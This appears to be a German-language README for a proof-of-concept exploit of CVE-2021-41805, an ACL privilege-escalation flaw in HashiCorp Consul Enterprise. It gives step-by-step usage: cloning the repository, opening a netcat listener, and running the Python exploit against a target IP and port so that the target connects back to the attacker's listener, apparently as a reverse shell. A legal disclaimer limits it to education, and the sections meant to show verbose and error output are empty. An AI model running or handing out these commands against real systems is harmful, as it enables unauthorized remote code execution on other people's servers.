
Ein Proof-of-Concept für CVE-2021-41805, der eine Sicherheitslücke in HashiCorp Consul Enterprise ist, die Remote Code Execution (RCE) mit erhöhten Privilegien ermöglicht.
[!WARNING] RECHTLICHER HINWEIS: Dieses Tool ist STRENGSTENS NUR FÜR BILDUNGSZWECKE bestimmt! Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist ILLEGAL. Es liegt in der Verantwortung des Benutzers, alle geltenden Gesetze einzuhalten. Der Entwickler dieses Tools übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Ein ACL-Token (mit den Standardberechtigungen operator:write) in einem Namespace kann für eine unbeabsichtigte Rechteausweitung in einem anderen Namespace verwendet werden. Dies kann missbraucht werden, um eine Remote Code Execution (RCE) mit erweiterten Privilegien zu erlangen.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]
Die Ausführung des Exploits mit den grundlegenden Argumenten: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [SSL verwenden]) wird eine einfache Ausgabe wie folgt liefern:
[*] The PUT request was made successfully. Check your listener...
Die Ausführung des Exploits mit den grundlegenden Argumenten plus -v [VERBOSE] wird eine ausführliche Ausgabe liefern:

Wenn ein Fehler auftritt, während der Exploit ausgeführt wird und das -v Argument angegeben ist, wird die Ausgabe etwa so aussehen:
